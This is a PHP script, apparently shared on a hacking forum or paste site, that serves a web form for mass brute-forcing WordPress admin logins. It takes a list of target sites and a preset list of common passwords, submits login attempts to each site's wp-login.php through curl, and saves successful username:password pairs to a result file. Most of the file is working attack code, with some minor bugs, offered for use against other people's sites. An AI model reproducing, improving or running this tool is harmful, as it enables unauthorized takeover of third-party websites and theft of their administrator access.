Wordpress Mass brute Force

1.  
2. <?
3. # Wordpress Mass brute Force Priv8 ^_*
4. # Coded by Lagrip-dz
5. # Devloped by Th3 K!LL3r Dz
6. # Style Leacked By Th3 K!LL3r Dz
7. # copyright to sec4ever.com
8. # special Greet'z to : n4ssim , Damane2011
9. # Greet'z to : all sec4ver members
10. echo '<html>
11. <head>
12.     <link href="http://dz48-coders.org/indexi/pic/favicon.ico" type="image/x-icon" rel="shortcut icon" />
13.     <meta name="author" content="Th3 K!LL3r Dz" />
14.    <meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
15.    <meta name="description" content="Th3 K!LL3r Dz fr0m Relizane !n aLGeria" />
16. <title># Wordpress Mass brute Force #</title>
17.  <style type=\'text/css\'>
18. input[type=submit], input[type=button], input[type=reset]{
19.     text-align:center;
20.     background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
21.     border:1px solid #4D4D4D;
22.     color:#FFFFFF;
23.     border-top-color:#565656;
24.     padding:4px 6px;
25.     margin:4px 5px;
26.     height:16px;
27.     -moz-box-shadow:0 0 1px black;
28.     -webkit-box-shadow:0 0 1px black;
29.     box-shadow:0 0 1px black;
30.     text-shadow:0 1px black;
31.     -moz-border-radius:4px;
32.     -webkit-border-radius:4px;
33.     -khtml-border-radius:4px;
34.     border-radius:4px;
35.     height:23px;
36. }
37.  
38.  
39. input[type=text], input[type=password]{
40.     background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
41.     border:1px solid #4D4D4D;
42.     color:#CCCCCC;
43.     border-top-color:#565656;
44.     -moz-box-shadow:0 0 1px black;
45.     -webkit-box-shadow:0 0 1px black;
46.     box-shadow:0 0 1px black;
47.     -moz-border-radius:4px;
48.     -webkit-border-radius:4px;
49.     -khtml-border-radius:4px;
50.     border-radius:4px;
51.     height:18px;
52.     margin-left: 5px;
53. }
54. input , textarea , button , body , caption , table ,area , option {
55.    outline:none;
56.    transition: all 0.20s ease-in-out;
57.    -webkit-transition: all 0.25s ease-in-out;
58.    -moz-transition: all 0.25s ease-in-out;
59.    border-radius:3px;
60.    -webkit-border-radius:3px;
61.    -moz-border-radius:3px;
62.    //border:1px solid rgba(0,0,0, 0.2);
63. /*   font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
64. }
65. input , textarea {
66.    background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
67. }
68.  
69. input , textarea {
70.    outline:none;
71.    transition: all 0.20s ease-in-out;
72.    -webkit-transition: all 0.25s ease-in-out;
73.    -moz-transition: all 0.25s ease-in-out;
74.    border-radius:3px;
75.    -webkit-border-radius:3px;
76.    -moz-border-radius:3px;
77.    border:1px solid rgba(0,0,0, 0.2);
78. }
79. input:focus, textarea:focus {
80.  outline: 0;
81.  border-color: rgba(82, 168, 236, 0.8);
82.  -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
83.  -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
84.  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
85.  
86.  
87.    background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
88.    overflow: auto;
89.  
90. }
91. .x1 {}
92. .x2 {font-size:13px;
93. background-color:green;
94. color:black;}
95. hr {color:white;}
96. a {color:black;}
97. #x5 {
98.     font-family:tahoma;}
99. .d1 {color :#C17E0B;
100. font-family:tahoma;
101. font-size:13px;
102. font-weight:bold;}
103. #d4 {color:#C17E0B;
104. font-family:tahoma;
105. font-weight:bold;}
106.  </style>
107.  </head>
108. </br></br>
109. <center><b><font > Wordpress Mass brute Force </font></b><br /><br /><br />
110. <form method="post" action="" enctype="multipart/form-data">
111. <table width="50%" border="0">
112. <tr><td><p ><font class="d1">User :</font>
113. <input type="text" name="usr" value=\'admin\' size="15"> </font><br /><br /></p>
114. </td></tr>
115. <tr><td><font class="d1">Sites list :</font>
116. </td><td><font class="d1" >Pass list :</font></td></tr>
117. <tr><td>
118. <textarea name="sites" cols="40" rows="13" ></textarea>
119. </td><td>
120. <textarea name="w0rds" cols="20" rows="13" >
121. admin
122. 123456
123. password
124. 102030
125. 123123
126. 12345
127. 123456789
128. pass
129. test
130. admin123
131. demo
132. </textarea>
133. </td></tr><tr><td>
134. <font >
135. <input type="submit" name="x" value="start" id="d4">
136. </font></td></tr></table>
137. </form></center>';
138. @set_time_limit(0);
139.  
140.  
141. if($_POST['x']){
142.  
143. echo "<hr>";
144.  
145. $sites = explode("\n",$_POST["sites"]); // Get Sites By Th3 K!LL3r Dz !
146. $w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt By Th3 K!LL3r Dz !
147.  
148. $Attack = new Wordpress_brute_Force(); // Active Class
149.  
150.  
151. foreach($w0rds as $pwd){
152.  
153. foreach($sites as $site){
154.  
155.  
156. $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
157. flush();flush();
158.  
159. }
160.  
161. }
162.  
163. }
164.  
165.  
166. # Class & Function'z
167.  
168. function txt_cln($value){  return str_replace(array("\n","\r"),"",$value); }
169.  
170. class Wordpress_brute_Force{
171.  
172. public function check_it($site,$user,$pass){ // print result
173.  
174. if(eregi('profile.php',$this->post($site,$user,$pass))){
175.  echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/wp-admin/'>$site/wp-admin/</a></b></span><BR>";
176. $f = fopen("Wp-Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/wp-admin/\n"); fclose($f);
177. flush();
178. }else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
179.  
180. }  
181.  
182. public function post($site,$user,$pass){ // Post -> user & pass
183. $login =$site.'/wp-login.php';
184. $to = $site.'/wp-admin';
185. $token = $this->extract_token($site);
186. $log = array ('Log In','دخول');
187. $data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1);
188.  
189. $curl=curl_init();
190.  
191. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
192. curl_setopt($curl,CURLOPT_URL,$login);
193. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
194. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
195. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
196. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
197. curl_setopt($curl,CURLOPT_POST,1);
198. curl_setopt($curl,CURLOPT_POSTFIELDS,$data);
199. curl_setopt($curl,CURLOPT_TIMEOUT,20);
200.  
201. $exec=curl_exec($curl);
202. curl_close($curl);
203. return $exec;
204.  
205. }
206.  
207. public function extract_token($site){ // get token from source for -> function post
208.  
209. $source = $this->get_source($site);
210.  
211. preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
212.  
213. return $token[1][0];
214.  
215. }
216.  
217. public function get_source($site){ // get source for -> function extract_token
218.  
219. $curl=curl_init();
220. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
221. curl_setopt($curl,CURLOPT_URL,$login);
222. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
223. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
224. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
225. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
226. curl_setopt($curl,CURLOPT_TIMEOUT,20);
227.  
228. $exec=curl_exec($curl);
229. curl_close($curl);
230. return $exec;
231.  
232. }
233.  
234. }
235. ?>